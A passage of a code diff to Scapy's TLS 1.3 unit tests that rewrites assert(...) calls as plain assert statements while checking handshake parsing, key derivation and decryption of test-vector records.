len(e[7].kxmodes) == 1 +assert e[7].kxmodes[0] == 1 +assert isinstance(e[8], TLS_Ext_RecordSizeLimit) = Decrypt a TLS 1.3 session - Parse server Hello @@ -275,14 +275,14 @@ t.tls_session.tls13_client_privshares["x25519"] = privkey t = TLS(serverHello, tls_session=t.tls_session.mirror()) -assert(len(t.msg) == 1) -assert(isinstance(t.msg[0], TLS13ServerHello)) -assert(len(t.msg[0].ext) == 2) +assert len(t.msg) == 1 +assert isinstance(t.msg[0], TLS13ServerHello) +assert len(t.msg[0].ext) == 2 e = t.msg[0].ext -assert(isinstance(e[0], TLS_Ext_KeyShare_SH)) -assert(e[0].server_share.group == 29) -assert(e[0].server_share.key_exchange == x25519_srv_pub) -assert(isinstance(e[1], TLS_Ext_SupportedVersion_SH)) +assert isinstance(e[0], TLS_Ext_KeyShare_SH) +assert e[0].server_share.group == 29 +assert e[0].server_share.key_exchange == x25519_srv_pub +assert isinstance(e[1], TLS_Ext_SupportedVersion_SH) = Decrypt a TLS 1.3 session - Handshake traffic secret derivation @@ -314,16 +314,16 @@ server_handshake_traffic_secret = clean(""" 37 b4 e9 c9 12 bc de d9 10 5d 42 be fd 59 d3 91 ad 38 """) -assert(len(t.tls_session.tls13_derived_secrets) == 5) -assert(t.tls_session.tls13_early_secret is not None) -assert(t.tls_session.tls13_early_secret == early_secret) -assert(t.tls_session.tls13_dhe_secret == ecdhe_secret) -assert(t.tls_session.tls13_handshake_secret is not None) -assert(t.tls_session.tls13_handshake_secret == handshake_secret) -assert( 'client_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets) -assert( t.tls_session.tls13_derived_secrets['client_handshake_traffic_secret'] == client_handshake_traffic_secret) -assert( 'server_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets) -assert(t.tls_session.tls13_derived_secrets['server_handshake_traffic_secret'] == server_handshake_traffic_secret) +assert len(t.tls_session.tls13_derived_secrets) == 5 +assert t.tls_session.tls13_early_secret is not None +assert t.tls_session.tls13_early_secret == early_secret +assert t.tls_session.tls13_dhe_secret == ecdhe_secret +assert t.tls_session.tls13_handshake_secret is not None +assert t.tls_session.tls13_handshake_secret == handshake_secret +assert 'client_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['client_handshake_traffic_secret'] == client_handshake_traffic_secret +assert 'server_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['server_handshake_traffic_secret'] == server_handshake_traffic_secret = Decrypt a TLS 1.3 session - Server handshake traffic key calculation @@ -339,8 +339,8 @@ server_hs_traffic_iv = clean(""" 5d 31 3e b2 67 12 76 ee 13 00 0b 30 """) -assert(t.tls_session.prcs.cipher.key == server_hs_traffic_key) -assert(t.tls_session.prcs.cipher.fixed_iv == server_hs_traffic_iv) +assert t.tls_session.prcs.cipher.key == server_hs_traffic_key +assert t.tls_session.prcs.cipher.fixed_iv == server_hs_traffic_iv = Decrypt a TLS 1.3 session - Decrypt and parse server encrypted handshake ~ crypto_advanced @@ -352,10 +352,10 @@ server_finished = clean(""" """) t = TLS13(serverEncHS, tls_session=t.tls_session) -assert(t.deciphered_len == 658) -assert(t.inner.type == 22) -assert(len(t.inner.msg) == 4) -assert(t.auth_tag == b'\xbf\x02S\xfeQu\xbe\x89\x8eu\x0e\xdcS7\r+') +assert t.deciphered_len == 658 +assert t.inner.type == 22 +assert len(t.inner.msg) == 4 +assert t.auth_tag == b'\xbf\x02S\xfeQu\xbe\x89\x8eu\x0e\xdcS7\r+' m = t.inner.msg @@ -363,18 +363,18 @@ m = t.inner.msg ~ crypto_advanced from scapy.layers.tls.handshake import TLSEncryptedExtensions -assert(isinstance(m[0], TLSEncryptedExtensions)) -assert(m[0].msgtype == 8) -assert(m[0].msglen == 36) -assert(m[0].extlen == 34) -assert(len(m[0].ext) == 3) -assert(isinstance(m[0].ext[0], TLS_Ext_SupportedGroups)) -assert(m[0].ext[0].groupslen == 18) -assert(m[0].ext[0].groups == [29, 23, 24, 25, 256, 257, 258, 259, 260]) -assert(isinstance(m[0].ext[1], TLS_Ext_RecordSizeLimit)) -assert(m[0].ext[1].record_size_limit == 16385) -assert(isinstance(m[0].ext[2], TLS_Ext_ServerName)) -assert(m[0].ext[2].len == 0) +assert isinstance(m[0], TLSEncryptedExtensions) +assert m[0].msgtype == 8 +assert m[0].msglen == 36 +assert m[0].extlen == 34 +assert len(m[0].ext) == 3 +assert isinstance(m[0].ext[0], TLS_Ext_SupportedGroups) +assert m[0].ext[0].groupslen == 18 +assert m[0].ext[0].groups == [29, 23, 24, 25, 256, 257, 258, 259, 260] +assert isinstance(m[0].ext[1], TLS_Ext_RecordSizeLimit) +assert m[0].ext[1].record_size_limit == 16385 +assert isinstance(m[0].ext[2], TLS_Ext_ServerName) +assert m[0].ext[2].len == 0 = Decrypt a TLS 1.3 session - Parse decrypted TLS13Certificate ~ crypto_advanced @@ -382,27 +382,27 @@ assert(m[0].ext[2].len == 0) from scapy.layers.tls.cert import Cert from scapy.layers.tls.handshake import (_ASN1CertAndExt, TLS13Certificate) -assert(isinstance(m[1], TLS13Certificate)) -assert(m[1].msgtype == 11) -assert(m[1].msglen == 441) -assert(m[1].cert_req_ctxt_len == 0) -assert(m[1].cert_req_ctxt == b'') -assert(m[1].certslen == 437) -assert(len(m[1].certs) == 1) -assert(isinstance(m[1].certs[0], _ASN1CertAndExt)) -assert(m[1].certs[0].cert[0] == 432) -assert(isinstance(m[1].certs[0].cert[1], Cert)) -assert(m[1].certs[0].cert[1].cA == False) -assert(m[1].certs[0].cert[1].isSelfSigned() == True) -assert(m[1].certs[0].cert[1].issuer['commonName'] == 'rsa') -assert(m[1].certs[0].cert[1].keyUsage == ['digitalSignature', 'keyEncipherment']) -assert(m[1].certs[0].cert[1].notAfter_str == '2026-07-30 01:23:59 UTC') -assert(m[1].certs[0].cert[1].notBefore_str == '2016-07-30 01:23:59 UTC') -assert(m[1].certs[0].cert[1].serial == 2) -assert(m[1].certs[0].cert[1].sigAlg == 'sha256WithRSAEncryption') -assert(m[1].certs[0].cert[1].signatureLen == 128) -assert(m[1].certs[0].cert[1].subject['commonName'] == 'rsa') -assert(m[1].certs[0].cert[1].version == 3) +assert isinstance(m[1], TLS13Certificate) +assert m[1].msgtype == 11 +assert m[1].msglen == 441 +assert m[1].cert_req_ctxt_len == 0 +assert m[1].cert_req_ctxt == b'' +assert m[1].certslen == 437 +assert len(m[1].certs) == 1 +assert isinstance(m[1].certs[0], _ASN1CertAndExt) +assert m[1].certs[0].cert[0] == 432 +assert isinstance(m[1].certs[0].cert[1], Cert) +assert m[1].certs[0].cert[1].cA == False +assert m[1].certs[0].cert[1].isSelfSigned() == True +assert m[1].certs[0].cert[1].issuer['commonName'] == 'rsa' +assert m[1].certs[0].cert[1].keyUsage == ['digitalSignature', 'keyEncipherment'] +assert m[1].certs[0].cert[1].notAfter_str == '2026-07-30 01:23:59 UTC' +assert m[1].certs[0].cert[1].notBefore_str == '2016-07-30 01:23:59 UTC' +assert m[1].certs[0].cert[1].serial == 2 +assert m[1].certs[0].cert[1].sigAlg == 'sha256WithRSAEncryption' +assert m[1].certs[0].cert[1].signatureLen == 128 +assert m[1].certs[0].cert[1].subject['commonName'] == 'rsa' +assert m[1].certs[0].cert[1].version == 3 = Decrypt a TLS 1.3 session - Parse decrypted TLSCertificateVerify @@ -410,14 +410,14 @@ assert(m[1].certs[0].cert[1].version == 3) from scapy.layers.tls.handshake import TLSCertificateVerify from scapy.layers.tls.keyexchange import _TLSSignature -assert(isinstance(m[2], TLSCertificateVerify)) -assert(isinstance(m[2], TLSCertificateVerify)) -assert(m[2].msgtype == 15) -assert(m[2].msglen == 132) -assert(isinstance(m[2].sig, _TLSSignature)) -assert(m[2].sig.sig_alg == 2052) -assert(m[2].sig.sig_len == 128) -assert(m[2].sig.sig_val == b"Zt|]\x88\xfa\x9b\xd2\xe5Z\xb0\x85\xa6\x10\x15\xb7!\x1f\x82L\xd4\x84\x14Z\xb3\xffR\xf1\xfd\xa8G{\x0bz\xbc\x90\xdbx\xe2\xd3:\\\x14\x1a\x07\x86S\xfak\xefx\x0c^\xa2H\xee\xaa\xa7\x85\xc4\xf3\x94\xca\xb6\xd3\x0b\xbe\x8dHY\xeeQ\x1f`)W\xb1T\x11\xac\x02vqE\x9eFD\\\x9e\xa5\x8c\x18\x1e\x81\x8e\x95\xb8\xc3\xfb\x0b\xf3'\x84\t\xd3\xbe\x15*=\xa5\x04>\x06=\xdae\xcd\xf5\xae\xa2\rS\xdf\xac\xd4/t\xf3") +assert isinstance(m[2], TLSCertificateVerify) +assert isinstance(m[2], TLSCertificateVerify) +assert m[2].msgtype == 15 +assert m[2].msglen == 132 +assert isinstance(m[2].sig, _TLSSignature) +assert m[2].sig.sig_alg == 2052 +assert m[2].sig.sig_len == 128 +assert m[2].sig.sig_val == b"Zt|]\x88\xfa\x9b\xd2\xe5Z\xb0\x85\xa6\x10\x15\xb7!\x1f\x82L\xd4\x84\x14Z\xb3\xffR\xf1\xfd\xa8G{\x0bz\xbc\x90\xdbx\xe2\xd3:\\\x14\x1a\x07\x86S\xfak\xefx\x0c^\xa2H\xee\xaa\xa7\x85\xc4\xf3\x94\xca\xb6\xd3\x0b\xbe\x8dHY\xeeQ\x1f`)W\xb1T\x11\xac\x02vqE\x9eFD\\\x9e\xa5\x8c\x18\x1e\x81\x8e\x95\xb8\xc3\xfb\x0b\xf3'\x84\t\xd3\xbe\x15*=\xa5\x04>\x06=\xdae\xcd\xf5\xae\xa2\rS\xdf\xac\xd4/t\xf3" = Decrypt a TLS 1.3 session - Parse decrypted TLSFinished ~ crypto_advanced @@ -427,10 +427,10 @@ server_finished = clean(""" 9b 9b 14 1d 90 63 37 fb d2 cb dc e7 1d f4 de da 4a b4 2c 30 95 72 cb 7f ff ee 54 54 b7 8f 07 18 """) -assert(isinstance(m[3], TLSFinished)) -assert(m[3].msgtype == 20) -assert(m[3].msglen == 32) -assert(m[3].vdata == server_finished) +assert isinstance(m[3], TLSFinished) +assert m[3].msgtype == 20 +assert m[3].msglen == 32 +assert m[3].vdata == server_finished = Decrypt a TLS 1.3 session - Client handshake traffic key calculation @@ -444,8 +444,8 @@ client_hs_traffic_iv = clean(""" 5b d3 c7 1b 83 6e 0b 76 bb 73 26 5f """) -assert(t.tls_session.pwcs.cipher.key == client_hs_traffic_key) -assert(t.tls_session.pwcs.cipher.fixed_iv == client_hs_traffic_iv) +assert t.tls_session.pwcs.cipher.key == client_hs_traffic_key +assert t.tls_session.pwcs.cipher.fixed_iv == client_hs_traffic_iv = Decrypt a TLS 1.3 session - Decrypt and parse client encrypted handshake ~ crypto_advanced @@ -456,12 +456,12 @@ client_finished = clean(""" """) t = TLS13(clientEncHS, tls_session=t.tls_session.mirror()) -assert(t.deciphered_len == 37) -assert(t.inner.type == 22) -assert(len(t.inner.msg) == 1) +assert t.deciphered_len == 37 +assert t.inner.type == 22 +assert len(t.inner.msg) == 1 m = t.inner.msg -assert(isinstance(m[0], TLSFinished)) -assert(m[0].vdata == client_finished) +assert isinstance(m[0], TLSFinished) +assert m[0].vdata == client_finished = Decrypt a TLS 1.3 session - Application traffic secret derivation ~ crypto_advanced @@ -493,23 +493,23 @@ resumption_master_secret = clean(""" """) -assert(t.tls_session.tls13_master_secret is not None) -assert(t.tls_session.tls13_master_secret == master_secret) +assert t.tls_session.tls13_master_secret is not None +assert t.tls_session.tls13_master_secret == master_secret -assert(len(t.tls_session.tls13_derived_secrets) == 9) -assert('client_traffic_secrets' in t.tls_session.tls13_derived_secrets) -assert(len(t.tls_session.tls13_derived_secrets['client_traffic_secrets']) == 1) -assert(t.tls_session.tls13_derived_secrets['client_traffic_secrets'][0] == client_application_traffic_secret_0) +assert len(t.tls_session.tls13_derived_secrets) == 9 +assert 'client_traffic_secrets' in t.tls_session.tls13_derived_secrets +assert len(t.tls_session.tls13_derived_secrets['client_traffic_secrets']) == 1 +assert t.tls_session.tls13_derived_secrets['client_traffic_secrets'][0] == client_application_traffic_secret_0 -assert('server_traffic_secrets' in t.tls_session.tls13_derived_secrets) -assert(len(t.tls_session.tls13_derived_secrets['server_traffic_secrets']) == 1) -assert(t.tls_session.tls13_derived_secrets['server_traffic_secrets'][0] == server_application_traffic_secret_0) +assert 'server_traffic_secrets' in t.tls_session.tls13_derived_secrets +assert len(t.tls_session.tls13_derived_secrets['server_traffic_secrets']) == 1 +assert t.tls_session.tls13_derived_secrets['server_traffic_secrets'][0] == server_application_traffic_secret_0 -assert('exporter_secret' in t.tls_session.tls13_derived_secrets) -assert(t.tls_session.tls13_derived_secrets['exporter_secret'] == exporter_master_secret) +assert 'exporter_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['exporter_secret'] == exporter_master_secret -assert('resumption_secret' in t.tls_session.tls13_derived_secrets) -assert(t.tls_session.tls13_derived_secrets['resumption_secret'] == resumption_master_secret) +assert 'resumption_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['resumption_secret'] == resumption_master_secret = Decrypt a TLS 1.3 session - Application traffic keys calculation ~ crypto_advanced @@ -532,10 +532,10 @@ server_ap_traffic_iv = clean(""" cf 78 2b 88 dd 83 54 9a ad f1 e9 84 """) -assert(t.tls_session.rcs.cipher.key == client_ap_traffic_key) -assert(t.tls_session.rcs.cipher.fixed_iv == client_ap_traffic_iv) -assert(t.tls_session.wcs.cipher.key == server_ap_traffic_key) -assert(t.tls_session.wcs.cipher.fixed_iv == server_ap_traffic_iv) +assert t.tls_session.rcs.cipher.key == client_ap_traffic_key +assert t.tls_session.rcs.cipher.fixed_iv == client_ap_traffic_iv +assert t.tls_session.wcs.cipher.key == server_ap_traffic_key +assert t.tls_session.wcs.cipher.fixed_iv == server_ap_traffic_iv = Decrypt a TLS 1.3 session - Decrypt and parse server NewSessionTicket ~ crypto_advanced @@ -557,21 +557,21 @@ serverEncTicket = clean(""" """) t = TLS13(serverEncTicket, tls_session=t.tls_session.mirror()) -assert(t.deciphered_len == 206) -assert(t.inner.type == 22) -assert(t.auth_tag == b'\x9c\x81SUk;lgy\xb3{\xf1Y\x85hO') -assert(len(t.inner.msg) == 1) +assert t.deciphered_len == 206 +assert t.inner.type == 22 +assert t.auth_tag == b'\x9c\x81SUk;lgy\xb3{\xf1Y\x85hO' +assert len(t.inner.msg) == 1 m = t.inner.msg[0] -assert(m.msgtype == 4) -assert(m.ticket_lifetime == 30) -assert(m.ticket_age_add == 4208372421) -assert(m.noncelen == 2) -assert(len(m.ticket_nonce) == 2) -assert(m.ticket_nonce == b'\x00\x00') -assert(m.ticket == b',\x03]\x82\x93Y\xee_\xf7\xafN\xc9\x00\x00\x00\x00&*d\x94\xdcHm,\x8a4\xcb3\xfa\x90\xbf\x1b\x00p\xad=\xa2g\x7f\xa5\x90l[?}\x8f\x92\xf2(\xbd\xa4\r\xdar\x14p\xf9\xfb\xf2\x97\xb5\xae\xa6\x17do\xac\\\x03\'.\x97\x07\'\xc6!\xa7\x91A\xef_}\xe6P^[\xfb\xc3\x88\xe93Ci@\x93\x93J\xe4\xd3W') -assert(len(m.ext) == 1) -assert(isinstance(m.ext[0], TLS_Ext_EarlyDataIndicationTicket)) -assert(m.ext[0].max_early_data_size == 1024) +assert m.msgtype == 4 +assert m.ticket_lifetime == 30 +assert m.ticket_age_add == 4208372421 +assert m.noncelen == 2 +assert len(m.ticket_nonce) == 2 +assert m.ticket_nonce == b'\x00\x00' +assert m.ticket == b',\x03]\x82\x93Y\xee_\xf7\xafN\xc9\x00\x00\x00\x00&*d\x94\xdcHm,\x8a4\xcb3\xfa\x90\xbf\x1b\x00p\xad=\xa2g\x7f\xa5\x90l[?}\x8f\x92\xf2(\xbd\xa4\r\xdar\x14p\xf9\xfb\xf2\x97\xb5\xae\xa6\x17do\xac\\\x03\'.\x97\x07\'\xc6!\xa7\x91A\xef_}\xe6P^[\xfb\xc3\x88\xe93Ci@\x93\x93J\xe4\xd3W' +assert len(m.ext) == 1 +assert isinstance(m.ext[0], TLS_Ext_EarlyDataIndicationTicket) +assert m.ext[0].max_early_data_size == 1024 = Decrypt a TLS 1.3 session - Compute the PSK associated with the ticket @@ -590,8 +590,8 @@ psk_resumption = clean(""" a4 c5 85 1a 27 7f d4 13 11 c9 e6 2d 2c 94 92 e1 c4 f3 """) -assert(hash_len == 32) -assert(tls13_psk_secret == psk_resumption) +assert hash_len == 32 +assert tls13_psk_secret == psk_resumption = Decrypt a TLS 1.3 session - Decrypt and parse client Application Data ~ crypto_advanced @@ -612,12 +612,12 @@ clientEncAppData = clean(""" """) t = TLS13(clientEncAppData, tls_session=t.tls_session.mirror()) -assert(t.deciphered_len == 51) -assert(len(t.inner.msg) == 1) -assert(t.inner.type == 23) +assert t.deciphered_len == 51 +assert len(t.inner.msg) == 1 +assert t.inner.type == 23 m = t.inner.msg[0] -assert(isinstance(m, TLSApplicationData)) -assert(m.data == payload) +assert isinstance(m, TLSApplicationData) +assert m.data == payload = Decrypt a TLS 1.3 session - Decrypt and parse server Application Data ~ crypto_advanced @@ -636,12 +636,12 @@ serverEncAppData = clean(""" """) t = TLS13(serverEncAppData, tls_session=t.tls_session.mirror()) -assert(t.deciphered_len == 51) -assert(len(t.inner.msg) == 1) -assert(t.inner.type == 23) +assert t.deciphered_len == 51 +assert len(t.inner.msg) == 1 +assert t.inner.type == 23 m = t.inner.msg[0] -assert(isinstance(m, TLSApplicationData)) -assert(m.data == payload) +assert isinstance(m, TLSApplicationData) +assert m.data == payload = Decrypt a TLS 1.3 session - Decrypt client Alert ~ crypto_advanced @@ -653,13 +653,13 @@ clientEncAlert = clean(""" """) t = TLS13(clientEncAlert, tls_session=t.tls_session.mirror()) -assert(t.deciphered_len == 3) -assert(len(t.inner.msg) == 1) -assert(t.inner.type == 21) +assert t.deciphered_len == 3 +assert len(t.inner.msg) == 1 +assert t.inner.type == 21 m = t.inner.msg[0] -assert(isinstance(m, TLSAlert)) -assert(m.level == 1) -assert(m.descr == 0) +assert isinstance(m, TLSAlert) +assert m.level == 1 +assert m.descr == 0 = Decrypt a TLS 1.3 session - Decrypt server Alert ~ crypto_advanced @@ -669,13 +669,13 @@ serverEncAlert = clean(""" 99 d2 47 20 cf be 7e fa 7a 88 64 a9 """) t = TLS13(serverEncAlert, tls_session=t.tls_session.mirror()) -assert(t.deciphered_len == 3) -assert(len(t.inner.msg) == 1) -assert(t.inner.type == 21) +assert t.deciphered_len == 3 +assert len(t.inner.msg) == 1 +assert t.inner.type == 21 m = t.inner.msg[0] -assert(isinstance(m, TLSAlert)) -assert(m.level == 1) -assert(m.descr == 0) +assert isinstance(m, TLSAlert) +assert m.level == 1 +assert m.descr == 0 ########### HelloRetryRequest ############################################### @@ -707,25 +707,25 @@ clientHello1 = clean(""" """) t = TLS(clientHello1) -assert(len(t.msg) == 1) -assert(t.msg[0].msgtype == 1) -assert(t.msg[0].extlen == 129) -assert(len(t.msg[0].ext) == 8) +assert len(t.msg) == 1 +assert t.msg[0].msgtype == 1 +assert t.msg[0].extlen == 129 +assert len(t.msg[0].ext) == 8 e = t.msg[0].ext -assert(isinstance(e[0], TLS_Ext_ServerName)) -assert(isinstance(e[1], TLS_Ext_RenegotiationInfo)) -assert(isinstance(e[2], TLS_Ext_SupportedGroups)) -assert(isinstance(e[3],TLS_Ext_KeyShare_CH)) -assert(len(e[3].client_shares) == 1) -assert(e[3].client_shares[0].group == 29) -assert(e[3].client_shares[0].key_exchange == x25519_clt_pub) -assert(isinstance(e[4], TLS_Ext_SupportedVersion_CH)) -assert(isinstance(e[5], TLS_Ext_SignatureAlgorithms)) -assert(isinstance(e[6], TLS_Ext_PSKKeyExchangeModes)) -assert(e[6].kxmodeslen == 1) -assert(len(e[6].kxmodes) == 1) -assert(e[6].kxmodes[0] == 1) -assert(isinstance(e[7], TLS_Ext_RecordSizeLimit)) +assert isinstance(e[0], TLS_Ext_ServerName) +assert isinstance(e[1], TLS_Ext_RenegotiationInfo) +assert isinstance(e[2], TLS_Ext_SupportedGroups) +assert isinstance(e[3],TLS_Ext_KeyShare_CH) +assert len(e[3].client_shares) == 1 +assert e[3].client_shares[0].group == 29 +assert e[3].client_shares[0].key_exchange == x25519_clt_pub +assert isinstance(e[4], TLS_Ext_SupportedVersion_CH) +assert isinstance(e[5], TLS_Ext_SignatureAlgorithms) +assert isinstance(e[6], TLS_Ext_PSKKeyExchangeModes) +assert e[6].kxmodeslen == 1 +assert len(e[6].kxmodes) == 1 +assert e[6].kxmodes[0] == 1 +assert isinstance(e[7], TLS_Ext_RecordSizeLimit) @@ -763,24 +763,24 @@ helloRetryRequest = clean(""" """) t = TLS(helloRetryRequest, tls_session=t.tls_session.mirror()) -assert(len(t.msg) == 1) -assert(t.msg[0].msgtype == 2) +assert len(t.msg) == 1 +assert t.msg[0].msgtype == 2 digest = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest.update(b"HelloRetryRequest") -assert(t.msg[0].random_bytes == digest.finalize()) -assert(t.msg[0].extlen == 132) -assert(len(t.msg[0].ext) == 3) +assert t.msg[0].random_bytes == digest.finalize() +assert t.msg[0].extlen == 132 +assert len(t.msg[0].ext) == 3 e = t.msg[0].ext -assert(isinstance(e[0], TLS_Ext_KeyShare_HRR)) -assert(e[0].type == 51) -assert(e[0].len == 2) -assert(e[0].selected_group == 23) -assert(isinstance(e[1], TLS_Ext_Cookie)) -assert(e[1].type == 44) -assert(e[1].len == 116) -assert(e[1].cookielen == 114) -assert(e[1].cookie == b'q\xdc\xd0K\xb8\x8b\xc3\x18\x91\x199\x8a\x00\x00\x00\x00\xee\xfa\xfcv\xc1F\xb8#\xb0\x96\xf8\xaa\xca\xd3e\xdd\x000\x95?N\xdfbV6\xe5\xf2\x1b\xb2\xe2?\xcceK\x1b[@1\x8d\x10\xd17\xab\xcb\xb8ut\xe3n\x8a\x1f\x02_}\xfa]nPx\x1b^\xdaJ\xa1[\x0c\x8b\xe7x%}\x16\xaa00\xe9\xe7\x84\x1d\xd9\xe4\xc04"g\xe8\xca\x0c\xafW\x1f\xb2\xb7\xcf\xf0\xf94\xb0') -assert(isinstance(e[2], TLS_Ext_SupportedVersion_SH)) +assert isinstance(e[0], TLS_Ext_KeyShare_HRR) +assert e[0].type == 51 +assert e[0].len == 2 +assert e[0].selected_group == 23 +assert isinstance(e[1], TLS_Ext_Cookie) +assert e[1].type == 44 +assert e[1].len == 116 +assert e[1].cookielen == 114 +assert e[1].cookie == b'q\xdc\xd0K\xb8\x8b\xc3\x18\x91\x199\x8a\x00\x00\x00\x00\xee\xfa\xfcv\xc1F\xb8#\xb0\x96\xf8\xaa\xca\xd3e\xdd\x000\x95?N\xdfbV6\xe5\xf2\x1b\xb2\xe2?\xcceK\x1b[@1\x8d\x10\xd17\xab\xcb\xb8ut\xe3n\x8a\x1f\x02_}\xfa]nPx\x1b^\xdaJ\xa1[\x0c\x8b\xe7x%}\x16\xaa00\xe9\xe7\x84\x1d\xd9\xe4\xc04"g\xe8\xca\x0c\xafW\x1f\xb2\xb7\xcf\xf0\xf94\xb0' +assert isinstance(e[2], TLS_Ext_SupportedVersion_SH) = Decrypt a TLS 1.3 session with a retry - Parse second ClientHello @@ -829,30 +829,30 @@ clientHello2 = clean(""" """) t = TLS(clientHello2, tls_session=t.tls_session.mirror()) -assert(len(t.msg) == 1) -assert(t.msg[0].msgtype == 1) -assert(t.msg[0].extlen == 461) -assert(len(t.msg[0].ext) == 10) +assert len(t.msg) == 1 +assert t.msg[0].msgtype == 1 +assert t.msg[0].extlen == 461 +assert len(t.msg[0].ext) == 10 e = t.msg[0].ext -assert(isinstance(e[0], TLS_Ext_ServerName)) -assert(isinstance(e[1], TLS_Ext_RenegotiationInfo)) -assert(isinstance(e[2], TLS_Ext_SupportedGroups)) -assert(isinstance(e[3],TLS_Ext_KeyShare_CH)) -assert(len(e[3].client_shares) == 1) -assert(e[3].client_shares[0].group == 23) -assert(e[3].client_shares[0].key_exchange == secp256_clt_pub) -assert(isinstance(e[4], TLS_Ext_SupportedVersion_CH)) -assert(isinstance(e[5], TLS_Ext_SignatureAlgorithms)) -assert(isinstance(e[6], TLS_Ext_Cookie)) -assert(e[6].cookie == b'q\xdc\xd0K\xb8\x8b\xc3\x18\x91\x199\x8a\x00\x00\x00\x00\xee\xfa\xfcv\xc1F\xb8#\xb0\x96\xf8\xaa\xca\xd3e\xdd\x000\x95?N\xdfbV6\xe5\xf2\x1b\xb2\xe2?\xcceK\x1b[@1\x8d\x10\xd17\xab\xcb\xb8ut\xe3n\x8a\x1f\x02_}\xfa]nPx\x1b^\xdaJ\xa1[\x0c\x8b\xe7x%}\x16\xaa00\xe9\xe7\x84\x1d\xd9\xe4\xc04"g\xe8\xca\x0c\xafW\x1f\xb2\xb7\xcf\xf0\xf94\xb0') -assert(isinstance(e[7], TLS_Ext_PSKKeyExchangeModes)) -assert(e[7].kxmodeslen == 1) -assert(len(e[7].kxmodes) == 1) -assert(e[7].kxmodes[0] == 1) -assert(isinstance(e[8], TLS_Ext_RecordSizeLimit)) -assert(isinstance(e[9], TLS_Ext_Padding)) -assert(e[9].len == 175) -assert(e[9].padding == 175*b'\x00') +assert isinstance(e[0], TLS_Ext_ServerName) +assert isinstance(e[1], TLS_Ext_RenegotiationInfo) +assert isinstance(e[2], TLS_Ext_SupportedGroups) +assert isinstance(e[3],TLS_Ext_KeyShare_CH) +assert len(e[3].client_shares) == 1 +assert e[3].client_shares[0].group == 23 +assert e[3].client_shares[0].key_exchange == secp256_clt_pub +assert isinstance(e[4], TLS_Ext_SupportedVersion_CH) +assert isinstance(e[5], TLS_Ext_SignatureAlgorithms) +assert isinstance(e[6], TLS_Ext_Cookie) +assert e[6].cookie == b'q\xdc\xd0K\xb8\x8b\xc3\x18\x91\x199\x8a\x00\x00\x00\x00\xee\xfa\xfcv\xc1F\xb8#\xb0\x96\xf8\xaa\xca\xd3e\xdd\x000\x95?N\xdfbV6\xe5\xf2\x1b\xb2\xe2?\xcceK\x1b[@1\x8d\x10\xd17\xab\xcb\xb8ut\xe3n\x8a\x1f\x02_}\xfa]nPx\x1b^\xdaJ\xa1[\x0c\x8b\xe7x%}\x16\xaa00\xe9\xe7\x84\x1d\xd9\xe4\xc04"g\xe8\xca\x0c\xafW\x1f\xb2\xb7\xcf\xf0\xf94\xb0' +assert isinstance(e[7], TLS_Ext_PSKKeyExchangeModes) +assert e[7].kxmodeslen == 1 +assert len(e[7].kxmodes) == 1 +assert e[7].kxmodes[0] == 1 +assert isinstance(e[8], TLS_Ext_RecordSizeLimit) +assert isinstance(e[9], TLS_Ext_Padding) +assert e[9].len == 175 +assert e[9].padding == 175*b'\x00' = Decrypt a TLS 1.3 session with a retry - Parse ServerHello from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePrivateNumbers @@ -872,14 +872,14 @@ serverHello = clean(""" """) t = TLS(serverHello, tls_session=t.tls_session.mirror()) -assert(len(t.msg) == 1) -assert(isinstance(t.msg[0], TLS13ServerHello)) -assert(len(t.msg[0].ext) == 2) +assert len(t.msg) == 1 +assert isinstance(t.msg[0], TLS13ServerHello) +assert len(t.msg[0].ext) == 2 e = t.msg[0].ext -assert(isinstance(e[0], TLS_Ext_KeyShare_SH)) -assert(e[0].server_share.group == 23) -assert(e[0].server_share.key_exchange == secp256_srv_pub) -assert(isinstance(e[1], TLS_Ext_SupportedVersion_SH)) +assert isinstance(e[0], TLS_Ext_KeyShare_SH) +assert e[0].server_share.group == 23 +assert e[0].server_share.key_exchange == secp256_srv_pub +assert isinstance(e[1], TLS_Ext_SupportedVersion_SH) = Decrypt a TLS 1.3 session with a retry - Handshake traffic secret derivation @@ -909,16 +909,16 @@ server_handshake_traffic_secret = clean(""" 95 a1 ab f1 62 de 83 a9 79 27 c3 76 72 a4 a0 ce f8 a1 """) -assert(len(t.tls_session.tls13_derived_secrets) == 5) -assert(t.tls_session.tls13_early_secret is not None) -assert(t.tls_session.tls13_early_secret == early_secret) -assert(t.tls_session.tls13_dhe_secret == ecdhe_secret) -assert(t.tls_session.tls13_handshake_secret is not None) -assert(t.tls_session.tls13_handshake_secret == handshake_secret) -assert( 'client_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets) -assert( t.tls_session.tls13_derived_secrets['client_handshake_traffic_secret'] == client_handshake_traffic_secret) -assert( 'server_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets) -assert(t.tls_session.tls13_derived_secrets['server_handshake_traffic_secret'] == server_handshake_traffic_secret) +assert len(t.tls_session.tls13_derived_secrets) == 5 +assert t.tls_session.tls13_early_secret is not None +assert t.tls_session.tls13_early_secret == early_secret +assert t.tls_session.tls13_dhe_secret == ecdhe_secret +assert t.tls_session.tls13_handshake_secret is not None +assert t.tls_session.tls13_handshake_secret == handshake_secret +assert 'client_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['client_handshake_traffic_secret'] == client_handshake_traffic_secret +assert 'server_handshake_traffic_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['server_handshake_traffic_secret'] == server_handshake_traffic_secret = Decrypt a TLS 1.3 session with a retry - Server handshake traffic key calculation @@ -931,8 +931,8 @@ server_hs_traffic_iv = clean(""" c7 d3 95 c0 8d 62 f2 97 d1 37 68 ea """) -assert(t.tls_session.prcs.cipher.key == server_hs_traffic_key) -assert(t.tls_session.prcs.cipher.fixed_iv == server_hs_traffic_iv) +assert t.tls_session.prcs.cipher.key == server_hs_traffic_key +assert t.tls_session.prcs.cipher.fixed_iv == server_hs_traffic_iv = Decrypt a TLS 1.3 session with a retry - Decrypt and parse server handshake @@ -979,18 